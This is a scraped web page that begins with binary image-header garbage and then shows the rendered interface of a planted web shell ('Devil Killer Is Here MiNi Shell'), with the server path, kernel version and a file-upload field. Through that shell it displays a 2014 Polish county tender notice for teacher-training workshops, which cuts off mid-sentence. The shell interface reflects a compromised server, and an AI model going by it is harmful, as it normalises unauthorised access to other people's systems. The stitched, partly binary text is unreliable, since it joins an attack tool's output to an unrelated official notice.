JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140804/259708-N-2014.html

<p class="kh_header"><b>Olsztyn: Zamówienie na wykonanie usługi eksperckiej na prowadzenie szkoleń w formie warsztatów, wykładów, konsultacji grupowych dla uczestników projektu pn.:Szyte na miarę wsparcie dla szkół i przedszkoli z powiatu olsztyńskiego. Projekt współfinansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III - Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół.</b><br>
<b>Numer ogłoszenia: 259708 - 2014; data zamieszczenia: 04.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Olsztyńskiego , Plac Bema 5, 10-516 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5210500, faks 089 5210501.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-olsztynski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zamówienie na wykonanie usługi eksperckiej na prowadzenie szkoleń w formie warsztatów, wykładów, konsultacji grupowych dla uczestników projektu pn.:Szyte na miarę wsparcie dla szkół i przedszkoli z powiatu olsztyńskiego. Projekt współfinansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III - Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa ekspercka na prowadzenie szkoleń w formie warsztatów, wykładów, konsultacji grupowych dla uczestników projektu pn.: Szyte na miarę wsparcie dla szkół i przedszkoli z powiatu olsztyńskiego.
2. Zamówienie będzie współfinansowane przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego, realizowane w ramach projektu pt. Szyte na miarę wsparcie dla szkół i przedszkoli z powiatu olsztyńskiego, Program Operacyjny Kapitał Ludzki, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół.
3. Celem głównym projektu jest poprawa jakości funkcjonowania systemu doskonalenia nauczycieli w powiecie olsztyńskim poprzez kompleksowe wsparcie 30 szkół i 7 przedszkoli oraz 395 nauczycieli i dyrektorów/wicedyrektorów spójnie z ich potrzebami.
4. Wspólny Słownik Zamówień (CPV) - Kod CPV: 80000000-4 Usługi edukacyjne i szkoleniowe.
5. Zamawiający dokonał podziału zamówienia na 2 etapy, łączna ilość godzin wynosi - 1774 (gdzie przez jedną godzinę rozumie się 60 minut).
6.  Zamawiający nie dopuszcza składania ofert częściowych.
7. Szczegółowy opis przedmiotu zamówienia:

1)        Etap 1 zamówienia: 

a)      Realizacja form doskonalenia nauczycieli (warsztaty, wykłady, konsultacje grupowe) w ramach 24 ofert doskonalenia określonych przez ORE obejmuje:

-Rodzaj formy doskonalenia-warsztaty, Liczba osób w grupie- do 25, Liczba grup-16, Ilość dni szkoleniowych-5, Liczba godzin w 1 dniu szkoleniowym-3, Ilość ofert doskonalenia-1, Suma godzin-240.

-Rodzaj formy doskonalenia-warsztaty, Liczba osób w grupie- do 25, Liczba grup-27, Ilość dni szkoleniowych-5, Liczba godzin w 1 dniu szkoleniowym-3, Ilość ofert doskonalenia-2, Suma godzin-810.

-Rodzaj formy doskonalenia- wykłady, konsultacje grupowe, Liczba osób w grupie- do 25, Liczba grup-16, Ilość dni szkoleniowych-5, Liczba godzin w 1 dniu szkoleniowym-2, Ilość ofert doskonalenia-1, Suma godzin-160.

-Rodzaj formy doskonalenia- wykłady, konsultacje grupowe, Liczba osób w grupie- do 25, Liczba grup-27, Ilość dni szkoleniowych-5, Liczba godzin w 1 dniu szkoleniowym-2, Ilość ofert doskonalenia-2, Suma godzin-540.

Łączna suma godzin (1 godzina = 60 min.)-1750.
b) Formy doskonalenia nauczycieli realizowane będą w następujących placówkach:
1) Liceum Ogólnokształcące w Zespole Szkół w Biskupcu ,11-300 Biskupiec ul Chrobrego 13,
2) Technikum w Zespole Szkół w Biskupcu ,11-300 Biskupiec ul Chrobrego 13,
3) Zasadnicza Szkoła Zawodowa w Zespole Szkół w Biskupcu ,11-300 Biskupiec ul Chrobrego 13,
4) Gimnazjum Nr 1 im. Mikołaja Kopernika w Biskupcu, 11-300 Biskupiec ul. Ludowa 5,
5) Publiczne Przedszkole Jacek i Agatka w Biskupcu, 11-300 Biskupiec ul. Poznańska 3,
6) Gimnazjum w Zespole Szkół w Tuławkach, 11-001 Dywity, Tuławki 31,
7) Szkoła Podstawowa w Zespole Szkół w Tuławkach, 11-001 Dywity, Tuławki 31,
8) Szkoła Podstawowa we Frączkach, 11-001 Dywity, Frączki 4,
9) Szkoła Podstawowa nr 1 w Barczewie, 11-010 Barczewo ul. Wojska Polskiego 36,
10) Przedszkole Miejskie w Barczewie, 11-010 Barczewo ul. Słowackiego 7,
11) Szkoła Podstawowa w Bartołtach Wielkich, 11-010 Barczewo, Bartołty Wielkie 5,
12) Szkoła Podstawowa w Lamkowie, 11-010 Barczewo, Lamkowo 29,
13) Szkoła Podstawowa w Zespole Szkolno-Przedszkolnym w Biesalu, 11-936 Gietrzwałd, Biesal 59,
14) Szkoła Podstawowa Nr 3 im. Rotmistrza Witolda Pileckiego w Dobrym Mieście, 11-040 Dobre Miasto, ul. Garnizonowa 20,
15) Gimnazjum w Purdzie, 11-030 Purda, Purda 23,
16) Przedszkole w Purdzie, 11-030 Purda, Purda 18,
17) Szkoła Podstawowa w Zespole Szkolno-Przedszkolnym w Butrynach, 10-687 Olsztyn, Butryny 1a,
18) Przedszkole Samorządowe w Zespole Szkolno-Przedszkolnym w Butrynach, 10-687 Olsztyn, Butryny 1a,
19) Publiczne Przedszkole Jarzębinki w Klewkach, 10-687 Olsztyn, Klewki 13B,
20) Szkoła Podstawowa w Zespole Szkolno-Przedszkolnym w Klebarku Wielkim, 10-687 Olsztyn, Klebark Wielki 9,
21) Niepubliczna Szkoła Podstawowa w Nowej Wsi, 11-030 Nowa Wieś, Nowa Wieś 7,
22) Liceum Ogólnokształcące w Zespole Szkół im. K.C. Mrongowiusza w Olsztynku, 11-015 Olsztynek ul. Zamkowa 6,
23) Technikum w Zespole Szkół im. K.C. Mrongowiusza w Olsztynku, 11-015 Olsztynek ul. Zamkowa 6,
24) Zasadnicza Szkoła Zawodowa w Zespole Szkół im. K.C. Mrongowiusza w Olsztynku, 11-015 Olsztynek ul. Zamkowa 6,
25) Szkoła Podstawowa w Zespole Szkolno - Przedszkolnym w Waplewie, 11-015 Olsztynek, Waplewo 15,
26) Szkoła Podstawowa w Elgnówku, 11-015 Olsztynek, Elgnówko 27,
27) Gimnazjum w Zespole Szkół w Jezioranach, 11-320 Jeziorany ul. Konopnickiej 13,
28) Szkoła Podstawowa w Zespole Szkół w Jezioranach, 11-320 Jeziorany ul. Konopnickiej 13,
29) Przedszkole Samorządowe w Dywitach, 11-001 Dywity ul. Jana Pawła II 6,
30) Szkoła Podstawowa w Bukwałdzie, 11-001 Dywity, Bukwałd 39,
31) Szkoła Podstawowa w Spręcowie, 11-001 Dywity, Spręcowo 2,
32) Publiczne Gimnazjum im. Jana Pawła II w Świątkach, 11-008 Świątki, Świątki 95,
33) Przedszkole Samorządowe w Świątkach, 11-008 Świątki, Świątki 105,
34) Szkoła Podstawowa im. Majora H. Sucharskiego w Zespole Szkolno-Przedszkolny w Świątkach, 11-008 Świątki, Świątki 95,
35) Liceum Ogólnokształcące w Zespole Szkół w Dobrym Mieście, 11-040 Dobre Miasto ul. Fabryczna 6,
36) Technikum w Zespole Szkół w Dobrym Mieście, 11-040 Dobre Miasto ul. Fabryczna 6,
37) Zasadnicza Szkoła Zawodowa w Zespole Szkół w Dobrym Mieście, 11-040 Dobre Miasto ul. Fabryczna 6.

c) Wykonawca powinien zabezpieczyć kompleksową realizację form doskonalenia nauczycieli na najwyższym poziomie merytorycznym w następujących 24 ofertach doskonalenia (określonych przez Ośrodek Rozwoju Edukacji):
1) Jak pomóc uczniowi osiągnąć sukces edukacyjny
2) Ocenianie kształtujące
3) Techniki uczenia się i metody motywujące do nauki
4) Uczeń - aktywny uczestnik procesu uczenia się 
5) Wykorzystanie EWD w ewaluacji wewnętrznej szkoły 
6) Oferta edukacyjna drogą do właściwej realizacji podstawy programowej
7) Wspieranie pracy wychowawców klas - bezpieczna szkoła
8) Postawy uczniowskie. Jak je kształtować?
9) Budowa koncepcji pracy szkoły
10) Praca z uczniem młodszym
11) Praca z uczniem zdolnym
12) Praca z uczniem ze specjalnymi potrzebami edukacyjnym
13) Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny Internet
14) Projekt edukacyjny w szkole
15) Współpraca szkoły ze środowiskiem lokalnym
16) Rodzice są partnerami szkoły
17) Nauczyciel 45+
18) Szkoła promuje wartość edukacji
19) Doradztwo edukacyjno-zawodowe w szkole
20) Efektywna organizacja pracy zespołów nauczycielskich
21) Współpraca nauczycieli w prowadzeniu procesów edukacyjnych
22) Jak efektywnie wykorzystać wyposażenie i warunki lokalowe szkoły
23) Jak i po co prowadzić ewaluacje wewnętrzną?
24) Pierwszy/drugi rok pracy dyrektora szkoły

d) Wykonawca ponosi odpowiedzialność za merytoryczną realizację form doskonalenia nauczycieli.

e) Obowiązki Wykonawcy:
1) zapewnienie ekspertów w danych dziedzinach do przeprowadzenia form doskonalenia nauczycieli;
2) przesyłanie asystentowi kierownika projektu wersji elektronicznych materiałów szkoleniowych wykorzystywanych na potrzeby przeprowadzenia form doskonalenia nauczycieli w celu wydrukowania ich przez Zamawiającego, co najmniej 5 dni roboczych przed ustalonym terminem realizacji określonej formy doskonalenia;
3) ustalanie terminów realizacji poszczególnych form doskonalenia w porozumieniu ze Szkolnymi Organizatorami Rozwoju Edukacji (SORE);
4) zachowanie w tajemnicy wszelkich danych, do których będzie miał dostęp w związku z realizacją zamówienia;
5) przeprowadzenie testów sprawdzających wiedzę uczestników przed rozpoczęciem i na zakończenie cyklu doskonalenia oraz przeprowadzenie ankiet ewaluacyjnych;
6) w sytuacji gdy prowadzący zajęcia w imieniu Wykonawcy nie spełni oczekiwań merytorycznych uczestników form doskonalenia, Wykonawca na wniosek Zamawiającego zobowiązany jest do zastąpienia prowadzącego inną osobą spełniającą wymogi postawione w SIWZ;
7) wymiana któregokolwiek z ekspertów zaproponowanych w ofercie przetargowej lub rozszerzenie składu (potencjału osobowego Wykonawcy) jest dopuszczalne w szczególnych, uzasadnionych okolicznościach, po uprzednim zatwierdzeniu kandydatury przez Zamawiającego. Doświadczenie i kwalifikacje nowego eksperta muszą być nie niższe niż te, które posiadała osoba zastępowana, a w przypadku rozszerzenia składu, doświadczenie i kwalifikacje proponowanej osoby muszą spełniać wymagania określone w SIWZ, na podstawie której została przygotowana oferta przetargowa Wykonawcy;
8) na miejsce każdego niezatwierdzonego kandydata Wykonawca zaproponuje innego, w terminie wyznaczonym przez Zamawiającego. Doświadczenie i kwalifikacje nowego kandydata muszą spełniać wymagania określone w SIWZ, na podstawie której została przygotowana oferta przetargowa Wykonawcy;
9) Wykonawca zobowiązuje się do udokumentowania wykonanych usług realizacji form doskonalenia nauczycieli za pomocą uzgodnionej z Zamawiającym dokumentacji, w tym w szczególności związanej z rozliczeniem liczby zrealizowanych godzin dydaktycznych form doskonalenia nauczycieli i przekazania ich w terminie do 7 dnia następnego miesiąca za miesiąc poprzedni, z zastrzeżeniem, że jeżeli wymagania projektu określają inny - wcześniejszy termin przekazania odpowiednich dokumentów, dokumenty te zostaną przekazane Zamawiającemu najpóźniej na 4 dni przed upływem tego terminu;
10) w przypadku złożenia nieprawidłowej dokumentacji Wykonawca zobowiązany jest do jej poprawienia i ponownego przedłożenia Zamawiającemu w terminie 2 dni od momentu wezwania do jej poprawienia przez Zamawiającego;
11) Wykonawca zobowiązuje się do sporządzenia wszelkich zestawień wynikających z dokumentacji wykonania usługi na prośbę Zamawiającego w terminie 3 dni roboczych od dnia przedłożenia takiego żądania;
12) koszty przejazdów ekspertów prowadzących form doskonalenia nauczycieli pokrywa Wykonawca;
13) przesyłanie asystentowi kierownika projektu wersji elektronicznej certyfikatów ukończenia warsztatów, wykładów, konsultacji grupowych w oparciu o daną ofertę doskonalenia dla wszystkich uczestników w celu wydrukowania ich przez Zamawiającego;
14) wszelka dokumentacja sporządzona w ramach realizacji zamówienia powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo i nazwę projektu;
15) Wykonawca zapewnia sprzęt multimedialny niezbędny do realizacji przedmiotu zamówienia;
16) Zamawiający zastrzega sobie prawo do obserwacji warsztatów, wykładów, konsultacji grupowych przez SORE;
17) Zamawiający zastrzega w umowie z Wykonawcą prawo wglądu do dokumentów Wykonawcy związanych z realizowanym Projektem, w tym dokumentów finansowych.

f) Zamawiający zapewnia produkty na przerwy kawowe i materiały piśmiennicze dla uczestników warsztatów, wykładów, konsultacji grupowych.
2) Etap 2 zamówienia: 
a) Realizacja form doskonalenia nauczycieli (warsztaty) w ramach 4 sieci współpracy i samokształcenia obejmuje:
-Rodzaj formy doskonalenia- warsztaty w ramach sieci nr 1 - Rola dyrektora w promocji i budowaniu wizerunku szkoły i przedszkola, Liczba osób w grupie- 20, Liczba grup-1, Ilość dni szkoleniowych-2, Liczba godzin w 1 dniu szkoleniowym-3, Suma godzin-6.
-Rodzaj formy doskonalenia- warsztaty w ramach sieci nr 2 - Jak rozwijać twórcze myślenie uczniów, Liczba osób w grupie- 25, Liczba grup-1, Ilość dni szkoleniowych-2, Liczba godzin w 1 dniu szkoleniowym-3, Suma godzin-6.
-Rodzaj formy doskonalenia- warsztaty w ramach sieci nr 3 - Praca z uczniem młodszym - jak skutecznie i efektywnie pracować w grupie sześciolatków i siedmiolatków, Liczba osób w grupie- 22, Liczba grup-1, Ilość dni szkoleniowych-2, Liczba godzin w 1 dniu szkoleniowym-3, Suma godzin-6.
-Rodzaj formy doskonalenia- warsztaty w ramach sieci nr 4 - Jak wspierać dziecko w uczeniu matematyki, Liczba osób w grupie- 24, Liczba grup-1, Ilość dni szkoleniowych-2, Liczba godzin w 1 dniu szkoleniowym-3, Suma godzin-6.
Łączna suma godzin (1 godzina = 60 min.)-24.

b) Zamawiający wyznacza miasto Olsztyn jako miejsce przeprowadzenia warsztatów.

c) Wykonawca powinien zabezpieczyć kompleksową realizację form doskonalenia nauczycieli (warsztaty) w ramach 4 sieci współpracy i samokształcenia:
1) warsztaty w ramach sieci nr 1-Rola dyrektora w promocji i budowaniu wizerunku szkoły i przedszkola:
-Główne tematy-1 dzień szkoleniowy (3 h)-Formy promocji w zależności od placówki.
-Zagadnienia szczegółowe-Formy promocji bez ponoszenia nakładów pieniężnych; Skuteczne badanie rynku, aby promocja była trafna; Formy badania rynku, narzędzia - atrakcyjne i wiarygodne; Redagowanie ulotki, plakatu - atrakcyjność oferty, czego unikać (pod względem graficznym; proporcje - tekstu, hasła, słowa klucze); Promocja pozytywna i negatywna, jak zapobiegać promocji negatywnej; Promocja wewnętrzna i zewnętrzna; Błędy w promocji; Praktyczne sposoby zatrzymania uczniów w szkole powiatowej.
-Oczekiwania względem eksperta-Wiedza i umiejętności poparta doświadczeniem w zakresie zagadnień szczegółowych; Ekspert powinien być zorientowany w rynku edukacyjnym; Ekspert powinien posiadać umiejętność pracy z grupą; Warsztat prowadzony metodami aktywnymi, wykład, dyskusja; Indywidualne podejście do potrzeb każdej ze szkół; Przygotowanie materiałów szkoleniowych.
-Główne tematy-2 dzień szkoleniowy (3 h) - Wizerunek dyrektora szkoły i przedszkola.
-Zagadnienia szczegółowe-Oczekiwania od dyrektora szkoły i przedszkola odnośnie wizerunku (wiarygodny dyrektor); Jakie są oczekiwania od dyrektora, oparte badaniami, statystykami; Warsztat  wiedzy  i umiejętności ważnych dla dyrektora placówki (mediacja, dobry słuchacz, postawa asertywna, mowa ciała, słowa klucze-aby nie urazić współrozmówcę, nie zniechęcić).
-Oczekiwania względem eksperta-Wiedza i umiejętności poparta doświadczeniem w zakresie zagadnień szczegółowych; Ekspert powinien być zorientowany w rynku edukacyjnym; Ekspert powinien posiadać umiejętność pracy z grupą; Przygotowanie materiałów szkoleniowych.

2) warsztaty w ramach sieci nr 2 - Jak rozwijać twórcze myślenie uczniów:
-Główne tematy-1 i2 dzień szkoleniowy (2x3 h=6h)- Motywowanie, aktywizacja ucznia podczas lekcji.
-Zagadnienia szczegółowe-Jak wzbudzić nie zainteresowanie i rozwijać ciekawość poznawczą ucznia na każdym z poziomów nauczania; Jak włączyć metody aktywizujące w program nauczania? Jak je stosować mając do dyspozycji 45 minut lekcji; Konkretne zadania, ćwiczenia, zabawy, eksperymenty do zastosowania w nauczaniu  różnych przedmiotów (język polski, języki obce, matematyczno-przyrodnicze, artystyczne); Motywowanie ucznia, innowacyjne sposoby motywowania ucznia na wszystkich poziomach nauczania. Jak to zrobić, żeby uczniom się chciało chcieć; Proces grupowy i korzystanie z niego w pracy z klasą; Dostosowanie treści podczas szkolenia i umieszczanych na platformie do wszystkich poziomów nauczania, które reprezentują nauczyciele w sieci: przedszkole, szkoła podstawowa, gimnazjum, szkoła ponadgimnazjalna; Sprawdzone scenariusze (programy).
-Oczekiwania względem eksperta-Doświadczenie zawodowe w pracy w szkole lub w ścisłej współpracy z nauczycielami w obszarze motywowania, stosowania metod aktywizujących; Wiedza i umiejętności z zakresu tematu szkolenia poparte doświadczeniem w zakresie stosowania metod motywowania ucznia do nauki, motywowania ucznia do współpracy (innowacyjne narzędzia motywowania, świeże wiadomości, nowinki z ostatniego czasu, np. narzędzia coachingowe), stosowania metod aktywizujących podczas różnych lekcji przedmiotowych na każdym z poziomów nauczania , ze szczególnym uwzględnieniem szkoły podstawowej, gimnazjum, szkoły ponadgimnazjalnej, procesu grupowego i jego zastosowania we współpracy z klasą, grupą uczniów; Wysokie kompetencje trenerskie  w zakresie pracy z grupą nauczycieli: świadomość procesu grupowego i korzystania z niego w pracy z grupą, stosowanie metod aktywizujących w nauczaniu dorosłych; Przygotowanie praktycznych materiałów szkoleniowych (m.in. linków, zasobów internetowych, gdzie można znaleźć konkretne rzeczy).

3) warsztaty w ramach sieci nr 3 -Praca z uczniem młodszym - jak skutecznie i efektywnie pracować w grupie sześciolatków i siedmiolatków:
-Główne tematy-1 dzień szkoleniowy (3 h) - Sposoby (metody, formy) rozwiązywania konfliktów.
-Zagadnienia szczegółowe-Szkolenie powinno obejmować konflikty na linii uczeń-uczeń, uczeń-nauczyciel; W jaki sposób rozpoznać konflikt; Jak reagować na skonfliktowane strony; Postawy nauczyciela wobec stron skonfliktowanych; Jak rozmawiać z rodzicami o konflikcie, jak przekazywać im informacje na ten temat; U kogo szukać pomocy w rozwiązywaniu konfliktów? (szczeble rozwiązywania konfliktów, rozwiązania prawne, instytucje pomocowe); Profilaktyka zapobiegania konfliktom; Sprawdzone scenariusze (programy) wychowawcze.
-Oczekiwania względem eksperta-Doświadczenie zawodowe w pracy z dziećmi przedszkolnymi i lub edukacji wczesnoszkolnej (I-III); Wiedza i umiejętności z zakresu tematu szkolenia poparte doświadczeniem w zakresie: prowadzenia diagnozy wstępnej i końcowej dziecka przedszkolnego i ucznia na etapie edukacji wczesnoszkolnej, znajomości podstawy programowej w kl. O oraz przewidzianej dla klas I-III, metod wspomagania procesu dydaktyczno-wychowawczego ucznia młodszego, innowacyjnych narzędzi motywowania dzieci do nauki, przygotowania dzieci do sprawdzianu trzecioklasisty; Wysokie kompetencje trenerskie  w zakresie pracy z grupą nauczycieli: świadomość procesu grupowego i korzystania z niego w pracy z grupą, stosowanie metod aktywizujących w nauczaniu dorosłych; Przygotowanie praktycznych materiałów szkoleniowych (m.in. linków, zasobów internetowych, gdzie można znaleźć konkretne rzeczy).
-Główne tematy-2 dzień szkoleniowy (3 h) - Skuteczne przygotowanie do odnoszenia sukcesu szkolnego na kolejnych etapach edukacji.
-Zagadnienia szczegółowe-Diagnoza przedszkolna: co powinna zawierać? spójność diagnozowanych obszarów z podstawą programową; Diagnoza wstępna w klasie I: spójność z diagnozą końcową w klasie O; Jak upłynnićprzejście między tymi etapami?; Różne formy aktywności na podstawie wyników diagnozy; Sposoby motywowania dzieci przy dużych rozbieżnościach wiekowych dzieci w klasie i często odmiennym poziomie ich umiejętności na starcie; Sprawdzian trzecioklasisty (OPERON i OBUT) - czyli jak uzyskać sukces na koniec kl. III.
-Oczekiwania względem eksperta-Doświadczenie zawodowe w pracy z dziećmi przedszkolnymi i lub edukacji wczesnoszkolnej (I-III), ewentualnie metodyk lub konsultant pracujący w przeszłości jako nauczyciel; Wiedza i umiejętności z zakresu tematu szkolenia poparte doświadczeniem w zakresie: teorii konfliktu, jego genezy, mechanizmu, sposobów poznawania i reagowania na skonfliktowane strony, doboru adekwatnych do danej sytuacji postaw i reakcji nauczyciela wobec stron będących w konflikcie, prawidłowego przekazywania rodzicom informacji o konflikcie, przygotowania dzieci do sprawdzianu zewnętrznego OPERON i OBUT, prowadzenia mediacji i negocjacji, aktualnie obowiązujących aktów prawnych regulujących akty przemocy agresji, działań profilaktycznych zapobiegającym konfliktom; Wysokie kompetencje trenerskie  w zakresie pracy z grupą nauczycieli: znajomość procesu grupowego, stosowanie metod aktywizujących w nauczaniu dorosłych; 	Przygotowanie praktycznych materiałów szkoleniowych (m.in. linków, zasobów internetowych, gdzie można znaleźć konkretne rzeczy.

4) warsztaty w ramach sieci nr 4 - Jak wspierać dziecko w uczeniu matematyki?:
-Główne tematy-1 dzień szkoleniowy (3 h)- Radzenie sobie w sytuacjach trudnych z uczniem i klasą.
-Zagadnienia szczegółowe-Skuteczne narzędzia (metody, sposoby) współpracy z uczniem, który sprawia trudności oraz współpracy z klasą w kontekście trudnych dla nauczyciela zachowań ucznia; Jak dotrzeć do ucznia, który sprawia trudności?; Jak współpracować z uczniem, który utrudnia nauczycielowi przeprowadzenie lekcji; Jak skorzystać z potencjału klasy do rozwiązania sytuacji trudnej; Proces grupowy i korzystanie z niego we współpracy z klasą; Jak zapobiegać  sytuacjom trudnym?; Jak skutecznie motywować ucznia do nauki? Innowacyjne narzędzia motywowania.
-Oczekiwania względem eksperta-Doświadczenie zawodowe w pracy w szkole lub w ścisłej współpracy z nauczycielami w obszarze motywowania, współpracy z grupą uczniów, radzenia sobie w trudnych sytuacjach z uczniem i klasą; Wiedza i umiejętności z zakresu tematu szkolenia poparte doświadczeniem w zakresie: radzenia sobie z sytuacjami trudnymi z uczniem i klasą na każdym z poziomów nauczania , ze szczególnym uwzględnieniem szkoły podstawowej, gimnazjum, szkoły ponadgimnazjalnej, stosowania metod/narzędzi motywowania ucznia do nauki, motywowania ucznia do współpracy (innowacyjne narzędzia motywowania, świeże wiadomości, nowinki  z ostatniego czasu, np. narzędzia coachingowe), profilaktyki trudnych sytuacji we współpracy z uczniem i klasą na każdym z poziomów nauczania , ze szczególnym uwzględnieniem szkoły podstawowej, gimnazjum, szkoły ponadgimnazjalnej, procesu grupowego i jego zastosowania we współpracy z klasą, grupą uczniów, prowadzenia mediacji i negocjacji, rozwiązywania sytuacji konfliktowych; Wysokie kompetencje trenerskie w zakresie pracy z grupą nauczycieli: świadomość procesu grupowego i korzystania z niego w pracy z grupą, stosowanie metod aktywizujących w nauczaniu dorosłych; Przygotowanie praktycznych materiałów szkoleniowych (m.in. linków, zasobów internetowych, gdzie można znaleźć konkretne 